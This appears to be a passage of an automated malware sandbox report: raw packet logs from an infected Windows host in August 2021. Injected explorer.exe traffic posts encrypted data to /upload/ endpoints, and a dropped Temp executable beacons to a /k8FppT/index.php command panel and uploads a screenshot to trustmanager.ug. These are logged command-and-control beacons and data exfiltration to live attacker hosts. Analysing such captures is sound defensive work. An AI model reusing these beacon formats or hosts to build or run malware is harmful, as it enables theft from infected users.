Aug 23, 2021 02:08:50.716185093 CEST	12395	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 24 00 a5 ea Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vu$o<XjJP(<^uy[\Ezm{R$?C[B#ytQ9-f&I5=#(f5>]@>Lwx7OdsC(J.R'
Aug 23, 2021 02:08:51.976286888 CEST	12396	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:51 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49744	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:52.327398062 CEST	12397	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 357 Host: atvcampingtrips.com
Aug 23, 2021 02:08:52.327419043 CEST	12398	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 40 5a a5 f4 Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vu@ZoXiiPS>6{;]_?W6T72] (WSEC8Z4k$gkUsA_Pu~gqNCypx@
Aug 23, 2021 02:08:53.574415922 CEST	12407	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:52 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.3	49746	220.125.1.129	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:53.951819897 CEST	12408	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 244 Host: atvcampingtrips.com
Aug 23, 2021 02:08:53.951848984 CEST	12408	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 64 4b bc fb Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vudKu@MOeBE$tl^RJFIYgq^!lmJ57q\ck$-Io.[O}SBgdct?!f
Aug 23, 2021 02:08:55.215859890 CEST	12409	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:54 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.3	49747	220.125.1.129	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:55.560694933 CEST	12410	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: atvcampingtrips.com
Aug 23, 2021 02:08:55.560755014 CEST	12410	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 61 5a c3 ea Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vuaZ }\CPgHve>b\|
Aug 23, 2021 02:08:56.804647923 CEST	12411	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:56 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.3	49748	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:57.567873955 CEST	12412	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.206 Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:57.742371082 CEST	12413	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:08:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 31 31 34 0d 0a 3c 63 3e 31 30 30 30 30 32 31 30 30 31 2b 2b 2b 51 55 6f 4b 4c 50 2b 4c 44 42 49 41 6c 77 4a 38 5a 46 56 54 47 43 70 7a 50 50 42 44 5a 64 6d 62 55 78 32 52 4b 4b 75 68 34 63 55 69 6c 56 67 66 58 58 34 47 72 74 30 50 6c 77 66 76 52 72 43 47 57 76 70 35 6b 33 41 44 6a 6e 35 51 4e 45 4c 66 76 62 55 34 6e 52 2f 2f 63 76 32 45 68 4f 6e 51 2b 39 4e 61 50 67 73 6d 4f 48 30 77 49 69 51 43 6d 41 67 74 53 47 34 6d 23 31 30 30 30 30 32 32 30 30 31 2b 2b 2b 51 55 6f 4b 4c 4c 61 65 44 45 6f 43 67 41 63 37 64 46 31 51 43 53 42 69 4f 65 4a 48 4f 35 53 58 45 68 6e 61 5a 70 71 74 38 4d 6f 6c 69 6c 67 44 42 32 68 52 38 77 3d 3d 23 31 30 30 30 30 32 33 30 30 31 2b 2b 2b 51 55 6f 4b 4c 4c 61 65 44 45 6f 43 67 41 63 37 64 46 31 51 43 53 42 69 4f 65 4a 48 4f 35 53 58 45 68 6e 61 5a 6f 69 38 37 73 49 6c 6a 30 35 66 54 48 56 4d 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 114<c>1000021001+++QUoKLP+LDBIAlwJ8ZFVTGCpzPPBDZdmbUx2RKKuh4cUilVgfXX4Grt0PlwfvRrCGWvp5k3ADjn5QNELfvbU4nR//cv2EhOnQ+9NaPgsmOH0wIiQCmAgtSG4m#1000022001+++QUoKLLaeDEoCgAc7dF1QCSBiOeJHO5SXEhnaZpqt8MolilgDB2hR8w==#1000023001+++QUoKLLaeDEoCgAc7dF1QCSBiOeJHO5SXEhnaZoi87sIlj05fTHVM#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.3	49749	220.125.1.129	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:57.845848083 CEST	12414	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: atvcampingtrips.com
Aug 23, 2021 02:08:57.845868111 CEST	12414	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 7f 05 fc 89 Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vuRcah6T][iF8(7P^I7#
Aug 23, 2021 02:08:58.769399881 CEST	15389	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:58 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.3	49751	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:57.885591030 CEST	12414	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cb Host: trustmanager.ug Content-Length: 93529 Cache-Control: no-cache
Aug 23, 2021 02:08:57.885867119 CEST	12414	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 30 62 30 65 62 33 64 35 32 33 33 30 30 33 30 66 36 62 62 36 37 62 33 62 65 65 33 30 36 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------40b0eb3d52330030f6bb67b3bee306cbContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:08:57.886466980 CEST	12424	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:08:57.887159109 CEST	12427	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:08:57.911727905 CEST	12433	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:08:57.911786079 CEST	12438	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:08:57.911974907 CEST	12441	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:08:57.912013054 CEST	12448	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:08:57.912570000 CEST	12450	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:08:57.912672043 CEST	12453	OUT	Data Raw: ce 7f da 35 e7 65 0b de 99 ef 67 2e fe cf d0 f4 2b 2e 3e 1d c1 f5 1f ce b9 99 2b a4 b4 38 f8 77 6d ee 7f ad 72 f2 b9 04 fb 56 98 45 ef 4f d5 9c 99 9b b2 87 a2 22 72 41 e0 d2 09 64 1d 1c 8f c6 90 9c d3 6b d1 b2 3c 1e 67 7d 09 d6 ee 55 fe 2c fd 69 Data Ascii: 5eg.+.>+8wmrVEO"rAdk<g}U,ikSUhY.m$c)ci'lT4;kfR}8h/j'ic>pPU\ <M?m%6M=#VmlF\|U}b=Jg3EoISUd.S{U}D[.
Aug 23, 2021 02:08:57.937035084 CEST	12458	OUT	Data Raw: c1 35 d7 1d 06 c2 4f b9 2e 3f 1a 85 fc 30 a7 fd 5c c0 d5 7d 76 9b dc 4f 2c ac b6 39 9e 69 c0 1a dd 7f 0d dc af dd 21 aa bb e8 97 89 ff 00 2c b3 f4 aa 58 9a 6f 66 43 c1 56 8e e8 cc 5e b8 a7 e2 ac b6 9f 70 9d 61 61 f8 53 0c 32 0e a8 47 e1 55 ed 22 Data Ascii: 5O.?0\}vO,9i!,XofCV^paaS2GU"b3[03R6JhJ-Sr@)@e()SK- G]G5 v=4\G:g4Qp:P(u'zZ(AE-u_%ga[HmzS<aq
Aug 23, 2021 02:08:57.988862038 CEST	12513	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 